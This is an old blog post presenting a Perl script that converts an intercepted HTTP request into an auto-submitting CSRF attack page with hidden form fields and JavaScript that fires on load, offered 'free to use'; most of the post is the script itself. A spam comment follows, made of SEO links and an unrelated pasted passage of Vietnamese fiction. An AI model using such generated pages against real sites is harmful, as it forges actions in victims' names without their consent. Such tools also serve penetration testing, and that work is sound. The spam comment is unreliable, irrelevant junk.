December 30, 2010

Parser for CSRF

It's so easy to implement a CSRF attack, However writing the attack in an HTML code might be endless process.
Therefore I developed a short Perl script which parses a request data into a CSRF request (almost the same).

What do you need in order to run the script:
1. Prel (obviously)
2. Burp Proxy - The attacker should intercept the request. and then copy all data to notepad. See example below:


My script pulls the data from the file "d:\csrf.txt", however it might be changed. The output is same with "html" extension.
See the source code of the script.


open(INF, '<d:\\csrf.txt') or die "error while opening the input file\n";
open(OUTF, '>d:\\csrf.html') or die "error while creatint the output file\n";
@arrin=<INF>;
@arrour=<OUTF>;
print "Script by Nir Valtman";
print "Enter the URL:";
$q=<STDIN>;
print OUTF "<html xmlns=\"http://www.w3.org/1999/xhtml\" >
<head>
<title>CSRF attack</title>
</head>
<body>
<form name=\"badform\" method=\"post\" action=\"$q\"> \n";
foreach $obj (@arrin)
{
chomp($obj);
@spltval=split('\t',$obj);
if ($spltval[0] eq "body")
{
print OUTF "<input type=\"hidden\" name=\"$spltval[1]\"  value=\"$spltval[2]\" />\n";
}
}
print OUTF "<script type=\"text/javascript\">
document.badform.submit();
</script>
</body>
</html>";
print "Done!";


The script is free to use - just give me credits.

1 comment:

 1. dongtam
  game mu
  http://nhatroso.net/
  http://nhatroso.com/
  nhạc sàn
  tư vấn luật
  dịch vụ thành lập công ty trọn gói
  công ty luật
  tổng đài tư vấn pháp luật
  thành lập công ty
  http://we-cooking.com/
  chém gió
  trung tâm ngoại ngữHinh, Phương Hiểu Nhưa không sao.
  Tôn Hinh Hinh rốt cục phục hồi lại tinh thần, nàng lắc đầu, đem những cái tình cảm cổ quái kỳ lạ hiếm khi xuất hiên trong đầu khu trừ sạch sẽ, hướng Hạ Thiên đi đến.

  - Hạ Thiên đồng học, cám ơn ngươi.
  Đôi mắt xinh đẹp của Tôn Hinh Hinh nhìn chằm chằm vào Hạ Thiên, tựa hồ muốn nhìn thấu thanh niên có vẻ bình thường trước mặt này.

  - Mỹ nữ tỷ tỷ, ta không phải học sinh ở đây.
  Hạ Thiên cũng đang nhìn Tôn Hinh Hinh, hiện tại thời tiết rất nóng nên mỗi người đều mặc rất ít quần áo, Tôn Hinh Hinh tự nhiên cũng không ngoại lệ, từng mảng lớn da thịt tuyết trắng lộ ra bên ngoài, để cho hắn có cảm giác được mở rộng tầm mắt.

  Tôn Hinh Hinh bị Hạ Thiên dùng ánh mắt sáng quắc nhìn vào khiến cho nàng không khỏi có chút mất tự nhiên, nhưng nàng lại ngạc nhiên phát hiện, gần đây nàng rất chán ghét bị nam nhân chăm

  ReplyDelete